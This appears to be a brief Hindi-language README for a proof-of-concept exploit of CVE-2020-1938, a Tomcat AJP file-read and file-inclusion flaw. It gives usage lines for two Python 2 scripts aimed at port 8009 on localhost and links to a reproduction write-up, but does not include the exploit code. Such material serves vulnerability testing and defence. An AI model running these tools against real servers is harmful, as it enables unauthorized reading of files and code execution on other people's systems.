CVE-2020-1938(Tomcat-file_include and file_red)
Tomcat के फ़ाइल इन्क्लूड और फ़ाइल पढ़ने की कमज़ोरी का शोषण POC
फ़ाइल पढ़ना
- Usage :python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
फ़ाइल शामिल करना
- Usage :python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
पुनरुत्पादन विवरण: http://www.svenbeast.com/post/fqSI9laE8/
- img:

संदर्भ लिंक: